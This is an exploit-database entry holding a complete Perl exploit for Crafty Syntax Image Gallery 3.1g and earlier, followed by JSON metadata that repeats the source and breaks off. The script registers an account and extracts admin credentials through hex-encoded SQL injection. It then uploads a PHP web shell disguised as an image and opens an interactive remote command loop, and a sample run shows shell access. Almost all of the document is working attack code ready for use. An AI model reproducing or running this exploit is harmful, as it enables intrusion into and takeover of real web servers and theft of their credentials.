ID 1337DAY-ID-336
Type zdt
Reporter undefined1_
Modified 2006-04-04T00:00:00
Description
Exploit for unknown platform in category web applications
=================================================================
Crafty Syntax Image Gallery <= 3.1g Remote Code Execution Exploit
=================================================================
#!/usr/bin/perl
###############################################################################
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
###############################################################################
# =====================================================
# $ crappy_syntax.pl localhost/csig/ 80
#
# :: crafty syntax image gallery <= 3.1g
# :: by undefined1_ @ bash-x.net/undef/
# :: note: this works only on mysql >= 4.0
#
#
# [+] creating user account
# [+] user: 98fe56123
# password: 7652L4M3l39q
# email: [email protected]
# [+] user '98fe56123' with password '7652L4M3l39q' registered
# [+] logged in as 98fe56123
# [+] projectid is 2
# [-] no admin found for this projectid, trying the username 'admin'
# [+] admin username: 'admin'
# [+] admin password: '1111'
# [+] logged in as 'admin'
# [+] getting shell location
# [+] shell @ 'userimages/1/18d76bcbc6f2.php'
# [+] have phun?
#
# localhost$ uname
# Linux
# localhost$ whoami
# nobody
# =====================================================
use strict;
use IO::Socket;
$| = 1;
print ":: crafty syntax image gallery <= 3.1g\n";
print ":: by undefined1_ @ bash-x.net/undef/\n";
print ":: note: this works only on mysql >= 4.0\n\n\n";
my $website = shift || usage();
my $port = shift || usage();
my $user = shift;
my $password = shift;
my $location = shift;
my $path = "/";
my $server = $website;
if(index($website, "/") != -1)
{
$path = substr($website, index($website, "/"));
$server = substr($website, 0, index($website, "/"));
if(substr($path, length($path)-1) ne "/")
{
$path .= "/";
}
}
if($location eq "")
{
if($user eq "" && $password eq "")
{
print "[+] creating user account\n";
$user = randstring(8,12);
$password = randstring(8,12);
my $email = randstring(8,12)."\@hotmail.com";
printf("[+]\tuser: %s\n", $user);
printf("\tpassword: %s\n", $password);
printf("\temail: %s\n", $email);
register($server, $path, $user, $user, $password, $email);
}
my $cookies = login($server, $port, $path, $user, $password);
my $projectid = get_projectid($server, $port, $path, $cookies);
my @admin = send_payload($server, $port, $path, $cookies, $projectid);
$cookies = login($server, $port, $path, $admin[0], $admin[1]);
upload_shell($server, $port, $path, $cookies, $projectid);
$location = get_shell_location($server,$port,$path,$cookies);
}
check_shell($server, $port, $path, $location);
printf("[+] have phun?\n\n");
my $command;
while(1)
{
print $server."\$ ";
while(<STDIN>)
{
$command = $_;
chomp($command);
last;
}
do_shell($server,$port,$path,$location,$command);
}
sub send_payload(\$,\$,\$,\$,\$) {
my $server = shift;
my $port = shift;
my $path = shift;
my $cookies = shift;
my $projectid = shift;
my $shellcode;
$shellcode = "\x61\x6e\x64\x20\x31\x3d\x30\x20\x75\x6e\x69\x6f\x6e\x20";
$shellcode .= "\x61\x6c\x6c\x20\x73\x65\x6c\x65\x63\x74\x20\x31\x2c\x32";
$shellcode .= "\x2c\x33\x2c\x34\x2c\x35\x2c\x75\x73\x65\x72\x69\x64\x20";
$shellcode .= "\x61\x73\x20\x64\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e";
$shellcode .= "\x2c\x37\x2c\x38\x2c\x39\x2c\x30\x2c\x31\x2c\x32\x2c\x33";
$shellcode .= "\x2c\x34\x2c\x35\x2c\x35\x20\x66\x72\x6f\x6d\x20\x67\x61";
$shellcode .= "\x6c\x6c\x65\x72\x79\x5f\x61\x63\x63\x65\x73\x73\x20\x77";
$shellcode .= "\x68\x65\x72\x65\x20\x67\x61\x6c\x6c\x65\x72\x79\x69\x64";
$shellcode .= "\x3d";
$shellcode .= $projectid;
$shellcode .= "\x20\x61\x6e\x64\x20\x70\x65\x72\x6d\x69\x73\x73\x69\x6f";
$shellcode .= "\x6e\x73\x3d\x43\x4f\x4e\x43\x41\x54\x28\x30\x78\x34\x36";
$shellcode .= "\x35\x35\x34\x63\x34\x63\x29\x20\x2d\x2d";
my $query = "GET ".$path."slides.php?limitquery_s=".urlEncode($shellcode)." HTTP/1.1\r\n";
$query .= "Host: $server\r\n";
$query .= "User-Agent: Mozilla/5.0\r\n";
$query .= "Connection: close\r\n";
$query .= $cookies;
$query .= "\r\n";
my $data = sendpacket($server, $port, $query);
if($data !~ /photo_captions\[1\] = "/)
{
print "[-] no admin found for this projectid, trying the username 'admin'\n";
$shellcode = "and 1=0 union all select 1,username as image,3,4,5,password AS description,7,8,9,10,11,12,13,14,15,16 from gallery_users where username=CONCAT(0x61646d696e) --";
$query = "GET ".$path."slides.php?limitquery_s=".urlEncode($shellcode)." HTTP/1.1\r\n";
$query .= "Host: $server\r\n";
$query .= "User-Agent: Mozilla/5.0\r\n";
$query .= "Connection: close\r\n";
$query .= $cookies;
$query .= "\r\n";
my $data = sendpacket($server, $port, $query);
if($data !~ /photo_captions\[1\] = "/ || $data !~ /photo_urls\[1\] = "/)
{
print "[-] exploit failed\n";
exit;
}
my $index1 = index($data, "photo_captions[1] = \" ") + 22;
my $index2 = index($data, "\"", $index1);
my $passwd = substr($data, $index1, $index2-$index1);
$index1 = index($data, "photo_urls[1] = \"") + 17;
$index2 = index($data, "\"", $index1);
$data = substr($data, $index1, $index2-$index1);
$index1 = rindex($data, "/") + 1;
my $username = substr($data, $index1);
print "[+] admin username: '$username'\n";
print "[+] admin password: '$passwd'\n";
my @ret;
push(@ret, $username);
push(@ret, $passwd);
return @ret;
}
my $index1 = index($data, "photo_captions[1] = \" ") + 22;
my $index2 = index($data, "\"", $index1);
my $uid = substr($data, $index1, $index2-$index1);
print "[+] admin uid: '$uid'\n";
$shellcode = "and 1=0 union all select 1,username as image,3,4,5,password AS description,7,8,9,10,11,12,13,14,15,16 from gallery_users where recno=".$uid." --";
$query = "GET ".$path."slides.php?limitquery_s=".urlEncode($shellcode)." HTTP/1.1\r\n";
$query .= "Host: $server\r\n";
$query .= "User-Agent: Mozilla/5.0\r\n";
$query .= "Connection: close\r\n";
$query .= $cookies;
$query .= "\r\n";
my $data = sendpacket($server, $port, $query);
if($data !~ /photo_captions\[1\] = "/ || $data !~ /photo_urls\[1\] = "/)
{
print "[-] exploit failed (mysql < 4 ?)\n";
exit;
}
$index1 = index($data, "photo_captions[1] = \" ") + 22;
$index2 = index($data, "\"", $index1);
my $passwd = substr($data, $index1, $index2-$index1);
$index1 = index($data, "photo_urls[1] = \"") + 17;
$index2 = index($data, "\"", $index1);
$data = substr($data, $index1, $index2-$index1);
$index1 = rindex($data, "/") + 1;
my $username = substr($data, $index1);
print "[+] admin username: '$username'\n";
print "[+] admin password: '$passwd'\n";
my @ret;
push(@ret, $username);
push(@ret, $passwd);
return @ret;
}
sub do_shell(\$,\$,\$,\$,\$) {
my $server = shift;
my $port = shift;
my $path = shift;
my $location = shift;
my $command = shift;
my $d = "c=".$command;
my $query = "POST ".$path.$location." HTTP/1.1\r\n";
$query .= "Content-Type: application/x-www-form-urlencoded\r\n";
$query .= "Host: $server\r\n";
$query .= "User-Agent: Mozilla/5.0\r\n";
$query .= "Connection: close\r\n";
$query .= "Content-Length: ".length($d)."\r\n";
$query .= "\r\n";
$query .= $d;
my $data = sendpacket($server, $port, $query);
my $index = index($data, "\r\n\r\n");
if($index >= 0)
{
print substr($data, $index+4)."\n";
}
else
{
print "[-] shell error?\n";
}
}
sub check_shell(\$,\$,\$,\$) {
my $server = shift;
my $port = shift;
my $path = shift;
my $location = shift;
my $query = "GET ".$path.$location." HTTP/1.1\r\n";
$query .= "Host: $server\r\n";
$query .= "User-Agent: Mozilla/5.0\r\n";
$query .= "Connection: close\r\n";
$query .= "\r\n";
my $data = sendpacket($server, $port, $query);
if($data !~ /HTTP\/1.1 200 OK/)
{
print "[-] shell not found\n";
print "[-] try ".$server.$path."/userimages/\n";
exit;
}
}
sub get_shell_location(\$,\$,\$,\$) {
print "[+] getting shell location\n";
my $server = shift;
my $port = shift;
my $path = shift;
my $cookies = shift;
my $shellcode;
$shellcode = "\x61\x6e\x64\x20\x69\x6d\x61\x67\x65\x20\x4c\x49\x4b\x45\x20\x43";
$shellcode .= "\x4f\x4e\x43\x41\x54\x28\x30\x78\x32\x35\x32\x65\x37\x30\x36\x38";
$shellcode .= "\x37\x30\x29\x20\x6f\x72\x64\x65\x72\x20\x62\x79\x20\x72\x65\x63";
$shellcode .= "\x6e\x6f\x20\x64\x65\x73\x63\x20\x6c\x69\x6d\x69\x74\x20\x31\x20";
$shellcode .= "\x2d\x2d";
my $query = "GET ".$path."slides.php?limitquery_s=".urlEncode($shellcode)." HTTP/1.1\r\n";
$query .= "Host: $server\r\n";
$query .= "User-Agent: Mozilla/5.0\r\n";
$query .= "Connection: close\r\n";
$query .= $cookies;
$query .= "\r\n";
my $data = sendpacket($server, $port, $query);
if($data =~ /There are no photos in this gallery/)
{
print "[-] shell not found\n";
print "[-] try ".$server.$path."/userimages/\n";
exit;
}
my $index1 = index($data, "photo_urls[1] = \"") + 17;
my $index2 = index($data, "\"", $index1);
my $location = substr($data, $index1, $index2-$index1);
print "[+] shell @ '".$location."'\n";
return $location;
}
sub get_projectid(\$,\$,\$,\$) {
my $server = shift;
my $port = shift;
my $path = shift;
my $cookies = shift;
my $query = "GET ".$path."imagemenu.php?html=menu.tpl HTTP/1.1\r\n";
$query .= "Host: $server\r\n";
$query .= "User-Agent: Mozilla/5.0\r\n";
$query .= "Connection: close\r\n";
$query .= $cookies;
$query .= "\r\n";
my $data = sendpacket($server, $port, $query);
my $projectid;
if($data =~ /\?projectid=([0-9]*)/)
{
$projectid = $1;
}
else
{
print "[-] no projectid found";
exit;
}
print "[+] projectid is '$projectid'\n";
return $projectid;
}
sub upload_shell(\$,\$,\$,\$,\$) {
my $server = shift;
my $port = shift;
my $path = shift;
my $cookies = shift;
my $projectid = shift;
my $query = "GET ".$path."newimage.php?projectid=".$projectid." HTTP/1.1\r\n";
$query .= "Host: $server\r\n";
$query .= "User-Agent: Mozilla/5.0\r\n";
$query .= "Connection: close\r\n";
$query .= $cookies;
$query .= "\r\n";
my $data = sendpacket($server, $port, $query);
if($data =~ /Access denied.../)
{
print "[-] no admin privileges (mysql < 4.0 ?)\n";
exit;
}
my $shell = "<? if(isset(\$_POST['c'])) { system(\$_POST['c']); } ?>";
my $boundary = "-----------------------------220162907215434";
my $post = "--".$boundary."\r\n";
$post .= "Content-Disposition: form-data; name=\"projectid\"\r\n\r\n";
$post .= $projectid."\r\n";
$post .= "--".$boundary."\r\n";
$post .= "Content-Disposition: form-data; name=\"A_MONTH\"\r\n\r\n";
$post .= "03\r\n";
$post .= "--".$boundary."\r\n";
$post .= "Content-Disposition: form-data; name=\"A_DAY\"\r\n\r\n";
$post .= "26\r\n";
$post .= "--".$boundary."\r\n";
$post .= "Content-Disposition: form-data; name=\"A_YEAR\"\r\n\r\n";
$post .= "2006\r\n";
$post .= "--".$boundary."\r\n";
$post .= "Content-Disposition: form-data; name=\"fullimage\"; filename=\"my_image.jpg\"\r\n";
$post .= "Content-Type: text/plain\r\n\r\n";
$post .= $shell."\r\n";
$post .= "--".$boundary."\r\n";
$post .= "Content-Disposition: form-data; name=\"description\"\r\n\r\n";
$post .= "another image\r\n";
$post .= "--".$boundary."\r\n";
$post .= "Content-Disposition: form-data; name=\"ext\"\r\n\r\n";
$post .= ".php\r\n";
$post .= "--".$boundary."\r\n";
$post .= "Content-Disposition: form-data; name=\"feature__".$projectid."\"\r\n\r\n";
$post .= "Y\r\n";
$post .= "--".$boundary."\r\n";
$post .= "Content-Disposition: form-data; name=\"addnow\"\r\n\r\n";
$post .= "ADD\r\n";
$post .= "--".$boundary."--\r\n";
my $query = "POST ".$path."newimage.php?projectid=".$projectid." HTTP/1.1\r\n";
$query .= "Content-Type: multipart/form-data; boundary=".$boundary."\r\n";
$query .= "Host: $server\r\n";
$query .= "User-Agent: Mozilla/5.0\r\n";
$query .= "Connection: close\r\n";
$query .= $cookies;
$query .= "Content-Length: ".length($post)."\r\n";
$query .= "\r\n";
$query .= $post;
sendpacket($server, $port, $query);
}
sub login(\$,\$,\$,\$,\$) {
my $server = shift;
my $port = shift;
my $path = shift;
my $username = shift;
my $password = shift;
my $d = "whattodo=login&myusername=".$username."&mypassword=".$password;
my $query = "POST ".$path."index.php HTTP/1.1\r\n";
$query .= "Content-Type: application/x-www-form-urlencoded\r\n";
$query .= "Host: $server\r\n";
$query .= "User-Agent: Mozilla/5.0\r\n";
$query .= "Connection: close\r\n";
$query .= "Content-Length: ".length($d)."\r\n";
$query .= "\r\n";
$query .= $d;
my $data = sendpacket($server, $port, $query);
if($data =~ /<td><b>Your Name:<\/td><td><input type=text name=myusername/ || $data !~ /Set-Cookie: /)
{
print "[-] failed to login\n";
exit;
}
my $cookies = ""; # chocolate cookies
my $index1 = index($data, "\r\n\r\n");
if($index1 >= 0)
{
my $index2 = index($data, "Set-Cookie: ") + 12;
my $index3 = index($data, "\r\n", $index2);
$cookies = "Cookie: ".substr($data, $index2, $index3-$index2+2);
}
print "[+] logged in as '$username'\n";
return $cookies;
}
sub register(\$, \$, \$, \$, \$, \$, \$) {
my $server = shift;
my $path = shift;
my $name = shift;
my $user = shift;
my $password = shift;
my $email = shift;
my $d = "action=register&emailadd=".$email."&newname=".$name."&newusername=".$user."&newpassword=".$password;
my $query = "POST ".$path."lostsheep.php HTTP/1.1\r\n";
$query .= "Content-Type: application/x-www-form-urlencoded\r\n";
$query .= "Host: $server\r\n";
$query .= "User-Agent: Mozilla/5.0\r\n";
$query .= "Connection: close\r\n";
$query .= "Content-Length: ".length($d)."\r\n";
$query .= "\r\n";
$query .= $d;
my $data = sendpacket($server, $port, $query);
if($data =~ /<li>Sorry the username you entered <b><\/b> is already taken.. try again/)
{
print "[-] failed: username taken\n";
exit;
}
if($data =~ /you did not enter in a/)
{
print "[-] failed\n";
exit;
}
print "[+] user '$user' with password '$password' registered\n";
}
sub sendpacket(\$,\$,\$) {
my $server = shift;
my $port = shift;
my $request = shift;
my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $server, PeerPort => $port) or die "[-] Could not connect to $server:$port $!\n";
print $sock "$request";
my $data = "";
my $answer;
while($answer = <$sock>)
{
$data .= $answer;
}
close($sock);
return $data;
}
sub randstring(\$,\$) {
my $min = shift;
my $max = shift;
my $length = int( (rand(65535)%($max-$min+1))+$min);
my $ret = "";
for(my $i = 0; $i < $length; $i++)
{
my $w = int(rand(3));
if($w == 0)
{
$ret .= chr(97 + int(rand(26)));
}
elsif($w == 1)
{
$ret .= chr(65 + int(rand(26)));
}
else
{
$ret .= chr(48 + int(rand(10)));
}
}
return $ret;
}
sub usage() {
printf "usage: %s <website> <port> [user(optional)] [password(optional)] [shell path without trailing / (optional)]\n", $0;
printf "exemple: %s www.site.com/csig/ 80\n", $0;
exit;
}
sub urlEncode {
my ($string) = @_;
$string =~ s/(\W)/"%" . unpack("H2", $1)/ge;
return $string;
}
# 0day.today [2018-04-01] #
{"published": "2006-04-04T00:00:00", "id": "1337DAY-ID-336", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T00:13:49", "bulletin": {"published": "2006-04-04T00:00:00", "id": "1337DAY-ID-336", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 5.7, "modified": "2016-04-20T00:13:49", "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:C/"}}, "hash": "5aafa2da1a9ab290cd9031524b32306fd3916080bd44a126c4a996ece82a649d", "description": "Exploit for unknown platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T00:13:49", "edition": 1, "title": "Crafty Syntax Image Gallery <= 3.1g Remote Code Execution Exploit", "href": "http://0day.today/exploit/description/336", "modified": "2006-04-04T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/336", "references": [], "reporter": "undefined1_", "sourceData": "=================================================================\r\nCrafty Syntax Image Gallery <= 3.1g Remote Code Execution Exploit\r\n=================================================================\r\n\r\n\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\n###############################################################################\r\n# This program is free software; you can redistribute it and/or\r\n# modify it under the terms of the GNU General Public License\r\n# as published by the Free Software Foundation; either version 2\r\n# of the License, or (at your option) any later version.\r\n#\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with this program; if not, write to the Free Software\r\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\r\n###############################################################################\r\n\r\n# =====================================================\r\n# $ crappy_syntax.pl localhost/csig/ 80\r\n#\r\n# :: crafty syntax image gallery <= 3.1g\r\n# :: by undefined1_ @ bash-x.net/undef/\r\n# :: note: this works only on mysql >= 4.0\r\n#\r\n#\r\n# [+] creating user account\r\n# [+]\t\tuser: 98fe56123\r\n#\t\t\tpassword: 7652L4M3l39q\r\n#\t\t\temail: SehswdSx0E@hotmail.com\r\n# [+] user '98fe56123' with password '7652L4M3l39q' registered\r\n# [+] logged in as 98fe56123\r\n# [+] projectid is 2\r\n# [-] no admin found for this projectid, trying the username 'admin'\r\n# [+] admin username: 'admin'\r\n# [+] admin password: '1111'\r\n# [+] logged in as 'admin'\r\n# [+] getting shell location\r\n# [+] shell @ 'userimages/1/18d76bcbc6f2.php'\r\n# [+] have phun?\r\n#\r\n# localhost$ uname\r\n# Linux\r\n# localhost$ whoami\r\n# nobody\r\n# =====================================================\r\n\r\nuse strict; \r\nuse IO::Socket;\r\n\r\n$| = 1;\r\nprint \":: crafty syntax image gallery <= 3.1g\\n\";\r\nprint \":: by undefined1_ @ bash-x.net/undef/\\n\";\r\nprint \":: note: this works only on mysql >= 4.0\\n\\n\\n\";\r\n\r\nmy $website = shift || usage();\r\nmy $port = shift || usage();\r\nmy $user = shift;\r\nmy $password = shift;\r\nmy $location = shift;\r\n\r\n\r\n\r\nmy $path = \"/\";\r\nmy $server = $website;\r\nif(index($website, \"/\") != -1)\r\n{\r\n\t$path = substr($website, index($website, \"/\"));\r\n\t$server = substr($website, 0, index($website, \"/\"));\r\n\tif(substr($path, length($path)-1) ne \"/\")\r\n\t{\r\n\t\t$path .= \"/\";\r\n\t}\r\n}\r\nif($location eq \"\")\r\n{\r\n\tif($user eq \"\" && $password eq \"\")\r\n\t{\r\n\t\tprint \"[+] creating user account\\n\";\r\n\t\t$user = randstring(8,12);\r\n\t\t$password = randstring(8,12);\r\n\t\tmy $email = randstring(8,12).\"\\@hotmail.com\";\r\n\t\tprintf(\"[+]\\tuser: %s\\n\", $user);\r\n\t\tprintf(\"\\tpassword: %s\\n\", $password);\r\n\t\tprintf(\"\\temail: %s\\n\", $email);\r\n\t\tregister($server, $path, $user, $user, $password, $email);\r\n\t}\r\n\r\n\tmy $cookies = login($server, $port, $path, $user, $password);\r\n\tmy $projectid = get_projectid($server, $port, $path, $cookies);\r\n\tmy @admin = send_payload($server, $port, $path, $cookies, $projectid);\r\n\r\n\t$cookies = login($server, $port, $path, $admin[0], $admin[1]);\r\n\tupload_shell($server, $port, $path, $cookies, $projectid);\r\n\t$location = get_shell_location($server,$port,$path,$cookies);\r\n}\r\n\r\ncheck_shell($server, $port, $path, $location);\r\nprintf(\"[+] have phun?\\n\\n\");\r\nmy $command;\r\nwhile(1) \r\n{\r\n\tprint $server.\"\\$ \";\r\n\twhile(<STDIN>) \r\n\t{\r\n\t\t$command = $_;\r\n\t\tchomp($command);\r\n\t\tlast;\r\n\t}\r\n\tdo_shell($server,$port,$path,$location,$command);\r\n}\r\n\r\n\r\nsub send_payload(\\$,\\$,\\$,\\$,\\$) {\r\n\tmy $server = shift;\r\n\tmy $port = shift;\r\n\tmy $path = shift;\r\n\tmy $cookies = shift;\r\n\tmy $projectid = shift;\r\n\tmy $shellcode;\r\n\r\n\t$shellcode = \"\\x61\\x6e\\x64\\x20\\x31\\x3d\\x30\\x20\\x75\\x6e\\x69\\x6f\\x6e\\x20\";\r\n\t$shellcode .= \"\\x61\\x6c\\x6c\\x20\\x73\\x65\\x6c\\x65\\x63\\x74\\x20\\x31\\x2c\\x32\";\r\n\t$shellcode .= \"\\x2c\\x33\\x2c\\x34\\x2c\\x35\\x2c\\x75\\x73\\x65\\x72\\x69\\x64\\x20\";\r\n\t$shellcode .= \"\\x61\\x73\\x20\\x64\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6f\\x6e\";\r\n\t$shellcode .= \"\\x2c\\x37\\x2c\\x38\\x2c\\x39\\x2c\\x30\\x2c\\x31\\x2c\\x32\\x2c\\x33\";\r\n\t$shellcode .= \"\\x2c\\x34\\x2c\\x35\\x2c\\x35\\x20\\x66\\x72\\x6f\\x6d\\x20\\x67\\x61\";\r\n\t$shellcode .= \"\\x6c\\x6c\\x65\\x72\\x79\\x5f\\x61\\x63\\x63\\x65\\x73\\x73\\x20\\x77\";\r\n\t$shellcode .= \"\\x68\\x65\\x72\\x65\\x20\\x67\\x61\\x6c\\x6c\\x65\\x72\\x79\\x69\\x64\";\r\n\t$shellcode .= \"\\x3d\";\r\n\t$shellcode .= $projectid;\r\n\t$shellcode .= \"\\x20\\x61\\x6e\\x64\\x20\\x70\\x65\\x72\\x6d\\x69\\x73\\x73\\x69\\x6f\";\r\n\t$shellcode .= \"\\x6e\\x73\\x3d\\x43\\x4f\\x4e\\x43\\x41\\x54\\x28\\x30\\x78\\x34\\x36\";\r\n\t$shellcode .= \"\\x35\\x35\\x34\\x63\\x34\\x63\\x29\\x20\\x2d\\x2d\";\r\n\r\n\tmy $query = \"GET \".$path.\"slides.php?limitquery_s=\".urlEncode($shellcode).\" HTTP/1.1\\r\\n\";\r\n\t$query .= \"Host: $server\\r\\n\";\r\n\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t$query .= \"Connection: close\\r\\n\";\r\n\t$query .= $cookies;\r\n\t$query .= \"\\r\\n\";\r\n\tmy $data = sendpacket($server, $port, $query);\r\n\tif($data !~ /photo_captions\\[1\\] = \"/)\r\n\t{\r\n\t\tprint \"[-] no admin found for this projectid, trying the username 'admin'\\n\";\r\n\t\t$shellcode = \"and 1=0 union all select 1,username as image,3,4,5,password AS description,7,8,9,10,11,12,13,14,15,16 from gallery_users where username=CONCAT(0x61646d696e) --\";\r\n\t\t$query = \"GET \".$path.\"slides.php?limitquery_s=\".urlEncode($shellcode).\" HTTP/1.1\\r\\n\";\r\n\t\t$query .= \"Host: $server\\r\\n\";\r\n\t\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t\t$query .= \"Connection: close\\r\\n\";\r\n\t\t$query .= $cookies;\r\n\t\t$query .= \"\\r\\n\";\r\n\t\tmy $data = sendpacket($server, $port, $query);\r\n\t\tif($data !~ /photo_captions\\[1\\] = \"/ || $data !~ /photo_urls\\[1\\] = \"/)\r\n\t\t{\r\n\t\t\tprint \"[-] exploit failed\\n\";\r\n\t\t\texit;\r\n\t\t}\r\n\t\tmy $index1 = index($data, \"photo_captions[1] = \\\" \") + 22;\r\n\t\tmy $index2 = index($data, \"\\\"\", $index1);\r\n\t\tmy $passwd = substr($data, $index1, $index2-$index1);\r\n\r\n\t\t$index1 = index($data, \"photo_urls[1] = \\\"\") + 17;\r\n\t\t$index2 = index($data, \"\\\"\", $index1);\r\n\t\t$data = substr($data, $index1, $index2-$index1);\r\n\t\t$index1 = rindex($data, \"/\") + 1;\r\n\t\tmy $username = substr($data, $index1);\r\n\r\n\r\n\t\tprint \"[+] admin username: '$username'\\n\";\r\n\t\tprint \"[+] admin password: '$passwd'\\n\";\r\n\r\n\t\tmy @ret;\r\n\t\tpush(@ret, $username);\r\n\t\tpush(@ret, $passwd);\r\n\t\treturn @ret;\r\n\t}\r\n\tmy $index1 = index($data, \"photo_captions[1] = \\\" \") + 22;\r\n\tmy $index2 = index($data, \"\\\"\", $index1);\r\n\tmy $uid = substr($data, $index1, $index2-$index1);\r\n\tprint \"[+] admin uid: '$uid'\\n\";\r\n\r\n\r\n\r\n\r\n\r\n\t$shellcode = \"and 1=0 union all select 1,username as image,3,4,5,password AS description,7,8,9,10,11,12,13,14,15,16 from gallery_users where recno=\".$uid.\" --\";\r\n\t$query = \"GET \".$path.\"slides.php?limitquery_s=\".urlEncode($shellcode).\" HTTP/1.1\\r\\n\";\r\n\t$query .= \"Host: $server\\r\\n\";\r\n\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t$query .= \"Connection: close\\r\\n\";\r\n\t$query .= $cookies;\r\n\t$query .= \"\\r\\n\";\r\n\tmy $data = sendpacket($server, $port, $query);\r\n\tif($data !~ /photo_captions\\[1\\] = \"/ || $data !~ /photo_urls\\[1\\] = \"/)\r\n\t{\r\n\t\tprint \"[-] exploit failed (mysql < 4 ?)\\n\";\r\n\t\texit;\r\n\t}\r\n\t$index1 = index($data, \"photo_captions[1] = \\\" \") + 22;\r\n\t$index2 = index($data, \"\\\"\", $index1);\r\n\tmy $passwd = substr($data, $index1, $index2-$index1);\r\n\r\n\t$index1 = index($data, \"photo_urls[1] = \\\"\") + 17;\r\n\t$index2 = index($data, \"\\\"\", $index1);\r\n\t$data = substr($data, $index1, $index2-$index1);\r\n\t$index1 = rindex($data, \"/\") + 1;\r\n\tmy $username = substr($data, $index1);\r\n\r\n\r\n\tprint \"[+] admin username: '$username'\\n\";\r\n\tprint \"[+] admin password: '$passwd'\\n\";\r\n\r\n\tmy @ret;\r\n\tpush(@ret, $username);\r\n\tpush(@ret, $passwd);\r\n\treturn @ret;\r\n}\r\n\r\n\r\nsub do_shell(\\$,\\$,\\$,\\$,\\$) {\r\n\tmy $server = shift;\r\n\tmy $port = shift;\r\n\tmy $path = shift;\r\n\tmy $location = shift;\r\n\tmy $command = shift;\r\n\r\n\tmy $d = \"c=\".$command;\r\n\tmy $query = \"POST \".$path.$location.\" HTTP/1.1\\r\\n\";\r\n\t$query .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n\t$query .= \"Host: $server\\r\\n\";\r\n\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t$query .= \"Connection: close\\r\\n\";\r\n\t$query .= \"Content-Length: \".length($d).\"\\r\\n\";\r\n\t$query .= \"\\r\\n\";\r\n\t$query .= $d;\r\n\t\r\n\tmy $data = sendpacket($server, $port, $query);\r\n\tmy $index = index($data, \"\\r\\n\\r\\n\");\r\n\tif($index >= 0)\r\n\t{\r\n\t\tprint substr($data, $index+4).\"\\n\";\r\n\t}\r\n\telse\r\n\t{\r\n\t\tprint \"[-] shell error?\\n\";\r\n\t}\r\n}\r\n\r\nsub check_shell(\\$,\\$,\\$,\\$) {\r\n\tmy $server = shift;\r\n\tmy $port = shift;\r\n\tmy $path = shift;\r\n\tmy $location = shift;\r\n\r\n\t\r\n\tmy $query = \"GET \".$path.$location.\" HTTP/1.1\\r\\n\";\r\n\t$query .= \"Host: $server\\r\\n\";\r\n\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t$query .= \"Connection: close\\r\\n\";\r\n\t$query .= \"\\r\\n\";\r\n\tmy $data = sendpacket($server, $port, $query);\r\n\r\n\tif($data !~ /HTTP\\/1.1 200 OK/)\r\n\t{\r\n\t\tprint \"[-] shell not found\\n\";\r\n\t\tprint \"[-] try \".$server.$path.\"/userimages/\\n\";\r\n\t\texit;\r\n\t}\r\n}\r\n\r\nsub get_shell_location(\\$,\\$,\\$,\\$) {\t\r\n\tprint \"[+] getting shell location\\n\";\r\n\tmy $server = shift;\r\n\tmy $port = shift;\r\n\tmy $path = shift;\r\n\tmy $cookies = shift;\r\n\tmy $shellcode;\r\n\r\n\t$shellcode = \"\\x61\\x6e\\x64\\x20\\x69\\x6d\\x61\\x67\\x65\\x20\\x4c\\x49\\x4b\\x45\\x20\\x43\";\r\n\t$shellcode .= \"\\x4f\\x4e\\x43\\x41\\x54\\x28\\x30\\x78\\x32\\x35\\x32\\x65\\x37\\x30\\x36\\x38\";\r\n\t$shellcode .= \"\\x37\\x30\\x29\\x20\\x6f\\x72\\x64\\x65\\x72\\x20\\x62\\x79\\x20\\x72\\x65\\x63\";\r\n\t$shellcode .= \"\\x6e\\x6f\\x20\\x64\\x65\\x73\\x63\\x20\\x6c\\x69\\x6d\\x69\\x74\\x20\\x31\\x20\";\r\n\t$shellcode .= \"\\x2d\\x2d\";\r\n\r\n\t\r\n\tmy $query = \"GET \".$path.\"slides.php?limitquery_s=\".urlEncode($shellcode).\" HTTP/1.1\\r\\n\";\r\n\t$query .= \"Host: $server\\r\\n\";\r\n\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t$query .= \"Connection: close\\r\\n\";\r\n\t$query .= $cookies;\r\n\t$query .= \"\\r\\n\";\r\n\tmy $data = sendpacket($server, $port, $query);\r\n\tif($data =~ /There are no photos in this gallery/)\r\n\t{\r\n\t\tprint \"[-] shell not found\\n\";\r\n\t\tprint \"[-] try \".$server.$path.\"/userimages/\\n\";\r\n\t\texit;\r\n\t}\r\n\r\n\tmy $index1 = index($data, \"photo_urls[1] = \\\"\") + 17;\r\n\tmy $index2 = index($data, \"\\\"\", $index1);\r\n\tmy $location = substr($data, $index1, $index2-$index1);\r\n\tprint \"[+] shell @ '\".$location.\"'\\n\";\r\n\treturn 